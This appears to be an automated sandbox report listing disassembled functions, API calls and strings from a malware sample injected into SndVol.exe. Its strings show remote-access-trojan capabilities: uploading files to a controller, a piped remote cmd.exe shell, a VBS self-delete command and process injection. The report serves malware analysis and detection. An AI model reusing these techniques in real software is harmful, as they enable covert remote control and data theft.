Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18

Function 004137DC Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
LoadLibraryA.KERNEL32(?), ref: 0041386D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
FreeLibrary.KERNEL32(00000000), ref: 00413894
LoadLibraryA.KERNEL32(?), ref: 004138CC
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
FreeLibrary.KERNEL32(00000000), ref: 004138E5
GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
FreeLibrary.KERNEL32(00000000), ref: 0041390B

Strings

getaddrinfo, xrefs: 004137E9, 00413887, 004138D8
freeaddrinfo, xrefs: 00413808
getnameinfo, xrefs: 004137F8
\wship6, xrefs: 004138B4
\ws2_32, xrefs: 00413855

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE

Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
Sleep.KERNEL32(00000064), ref: 00411C63

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

@#G, xrefs: 00411D72
/stext ", xrefs: 0041198C, 00411A2E, 00411ACD
@#G, xrefs: 00411E45
$.F, xrefs: 004119B6

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$$.F$@#G$@#G
API String ID: 1223786279-2596709126
Opcode ID: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
Opcode Fuzzy Hash: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A

Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D828
_free.LIBCMT ref: 0044D84C
_free.LIBCMT ref: 0044D859
_free.LIBCMT ref: 0044D87E
_free.LIBCMT ref: 0044D88B
_free.LIBCMT ref: 0044D894
_free.LIBCMT ref: 0044DB72
_free.LIBCMT ref: 0044DB7A

Strings

pF, xrefs: 0044D80E, 0044DAF7

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754

Function 0492E578 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0492E5C0
_free.LIBCMT ref: 0492E5E4
_free.LIBCMT ref: 0492E5F1
_free.LIBCMT ref: 0492E616
_free.LIBCMT ref: 0492E623
_free.LIBCMT ref: 0492E62C
_free.LIBCMT ref: 0492E90A
_free.LIBCMT ref: 0492E912

Strings

pF, xrefs: 0492E5A6, 0492E88F

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction ID: 253590fffb765f5657370ccd4582a69b9563314060cce58500c90cd50ba12f5a
Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction Fuzzy Hash: 92C16272E00214BFEB20DAA8CD82FEE77FCAB49705F050175FA45EB285E670B9419764

Function 048EC609 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 296COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 048EC61A
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 048EC633
_wcslen.LIBCMT ref: 048EC700
_wcslen.LIBCMT ref: 048EC7BD
ShellExecuteW.SHELL32(00000000,004630AC,00000000,00469654,00469654,00000000), ref: 048EC9C2
ExitProcess.KERNEL32 ref: 048EC9CE

Strings

05ou`ou, xrefs: 048EC7B3
$.F, xrefs: 048EC835
C:\Windows\SysWOW64\SndVol.exe, xrefs: 048EC6AE, 048EC6B3, 048EC6E3, 048EC772, 048EC777, 048EC77E, 048EC842
t<F, xrefs: 048EC829
!G, xrefs: 048EC65E
!G, xrefs: 048EC690
6, xrefs: 048EC6F4

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _wcslen$CreateDirectoryExecuteExitProcessShell
String ID: $.F$05ou`ou$6$C:\Windows\SysWOW64\SndVol.exe$t<F$!G$!G
API String ID: 1288302323-737319927
Opcode ID: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
Instruction ID: 48501c6769fc7ccce4b511fbdc3ace76db36a552364ba735025d7abc7871a624
Opcode Fuzzy Hash: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
Instruction Fuzzy Hash: 1091A4216083815BE318FB3ADC50EBF77989F92648F104E6EE946D3091EFA4B909C657

Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133

Strings

Inj, xrefs: 0040E14F
ieinstal.exe, xrefs: 0040E0B9
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E0A2
ielowutil.exe, xrefs: 0040E0FA
!G, xrefs: 0040E061
0"G, xrefs: 0040E02D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
API String ID: 193334293-3226144251
Opcode ID: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
Opcode Fuzzy Hash: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A

Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
RegCloseKey.ADVAPI32(?), ref: 0041A749

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041A431
DisplayVersion, xrefs: 0041A4F2
UninstallString, xrefs: 0041A52E
InstallDate, xrefs: 0041A51A
DisplayName, xrefs: 0041A4C6
InstallLocation, xrefs: 0041A506
Publisher, xrefs: 0041A4DB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
Opcode Fuzzy Hash: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A

Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
GetCursorPos.USER32(?), ref: 0041B39E
SetForegroundWindow.USER32(?), ref: 0041B3A7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
ExitProcess.KERNEL32 ref: 0041B41A
CreatePopupMenu.USER32 ref: 0041B420
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435

Strings

Close, xrefs: 0041B426

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59

Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004432D8
_free.LIBCMT ref: 004432EE
_free.LIBCMT ref: 004432FF
_free.LIBCMT ref: 00443310
_free.LIBCMT ref: 00443327
GetCPInfo.KERNEL32(?,?), ref: 0044336F

Part of subcall function 00450054: _free.LIBCMT ref: 004500BF

_free.LIBCMT ref: 0044351B
_free.LIBCMT ref: 0044352E
_free.LIBCMT ref: 0044353C
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443589
_free.LIBCMT ref: 00443591
_free.LIBCMT ref: 00443599
_free.LIBCMT ref: 004435A1
_free.LIBCMT ref: 004435AF

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24

Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
__aulldiv.LIBCMT ref: 00407D89

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
CloseHandle.KERNEL32(00000000), ref: 00407FA0
CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
CloseHandle.KERNEL32(00000000), ref: 00408038

Strings

ReadFile error, xrefs: 00408004
SetFilePointerEx error, xrefs: 00408010
Uploading file to Controller: , xrefs: 00407E11

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
Opcode Fuzzy Hash: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B

Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
ExitProcess.KERNEL32 ref: 0040C57D

Strings

Temp, xrefs: 0040C453
""", 0, xrefs: 0040C49A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C520
open, xrefs: 0040C56B
.vbs, xrefs: 0040C418
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C4B2
exepath, xrefs: 0040C3EA
H"G, xrefs: 0040C3C8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
API String ID: 1913171305-2600661426
Opcode ID: 0fed04b8f83d723dc58248fa29da0096c2407ac2a725f0ac335c0f5183f427b2
Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
Opcode Fuzzy Hash: 0fed04b8f83d723dc58248fa29da0096c2407ac2a725f0ac335c0f5183f427b2
Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99

Function 048E6412 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 278sleepfileprocessCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 048E645E

Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE

__Init_thread_footer.LIBCMT ref: 048E649B
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 048E65B7
Sleep.KERNEL32(0000012C,00000093,?), ref: 048E660F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 048E6634
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 048E6661

Part of subcall function 049132BD: __onexit.LIBCMT ref: 049132C3

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 048E675C
Sleep.KERNEL32(00000064,00000062,00463050), ref: 048E6776
TerminateProcess.KERNEL32(00000000), ref: 048E678F

Strings

cmd.exe, xrefs: 048E64C5

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: FileInit_thread_footerProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
String ID: cmd.exe
API String ID: 3407654705-723907552
Opcode ID: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
Instruction ID: 86a2e5b2a6398f31fbb4ab132760b89abe9ee0e93ea6933804199b0c547ace2b
Opcode Fuzzy Hash: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
Instruction Fuzzy Hash: 15910A71600208BFE710BF69EC4097E3758EB42709F40497DF549E72A2EBA4BE48975B

Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 004136B6, 004136BE, 004136C2
65535, xrefs: 00413609

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E

Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
__dosmaperr.LIBCMT ref: 00438646
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
__dosmaperr.LIBCMT ref: 00438683
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
__dosmaperr.LIBCMT ref: 004386D7
_free.LIBCMT ref: 004386E3
_free.LIBCMT ref: 004386EA

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
Opcode Fuzzy Hash: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69

Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DC74
_free.LIBCMT ref: 0044DC82
_free.LIBCMT ref: 0044DDB0
_free.LIBCMT ref: 0044DDBB

Strings

tF, xrefs: 0044DE0C
pF, xrefs: 0044DC30, 0044DDF5

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF$tF
API String ID: 269201875-2954683558
Opcode ID: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
Opcode Fuzzy Hash: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58

Function 048EA4B6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 048EA4D0

Part of subcall function 048EA405: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,048EA4DD), ref: 048EA43B
Part of subcall function 048EA405: GetFileSize.KERNEL32(00000000,00000000,?,?,?,048EA4DD), ref: 048EA44A
Part of subcall function 048EA405: Sleep.KERNEL32(00002710,?,?,?,048EA4DD), ref: 048EA477
Part of subcall function 048EA405: CloseHandle.KERNEL32(00000000,?,?,?,048EA4DD), ref: 048EA47E

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 048EA50C
GetFileAttributesW.KERNEL32(00000000), ref: 048EA51D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 048EA534
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 048EA5AE

Part of subcall function 048FAFA7: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,048E4EA7,00462E24), ref: 048FAFC0

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 048EA6B7

Strings

05ou`ou, xrefs: 048EA534, 048EA6B7
H"G, xrefs: 048EA592
H"G, xrefs: 048EA587

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 05ou`ou$H"G$H"G
API String ID: 3795512280-2072512923
Opcode ID: 57fb3b3187018bfa0d892294d8208e0ca4ac340358e943beb335dea4f3d9221f
Instruction ID: 4376f970c3616d3ec3ef203eabf572eb6dd6f06176f27286a892abec863daca7
Opcode Fuzzy Hash: 57fb3b3187018bfa0d892294d8208e0ca4ac340358e943beb335dea4f3d9221f
Instruction Fuzzy Hash: 3551B2713042095BE718BB7AC854ABE779D9F87708F000F6CAA46D71E1DFD4B9058653

Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040549F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
TranslateMessage.USER32(?), ref: 0040555E
DispatchMessageA.USER32(?), ref: 00405569
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

DisplayMessage, xrefs: 004055CC
CloseChat, xrefs: 004055E9
GetMessage, xrefs: 004055D8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: f079c0d2b34872d8ae1ebe3bc79dc5d6cccdd417140d8d14566b63fd3ec36c73
Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
Opcode Fuzzy Hash: f079c0d2b34872d8ae1ebe3bc79dc5d6cccdd417140d8d14566b63fd3ec36c73
Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A

Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
CloseHandle.KERNEL32(00000000), ref: 00416123
DeleteFileA.KERNEL32(00000000), ref: 00416132
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

Temp, xrefs: 0041603E
@%G, xrefs: 004160F3
<, xrefs: 004160C1
@%G, xrefs: 0041615F
@, xrefs: 004160C8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

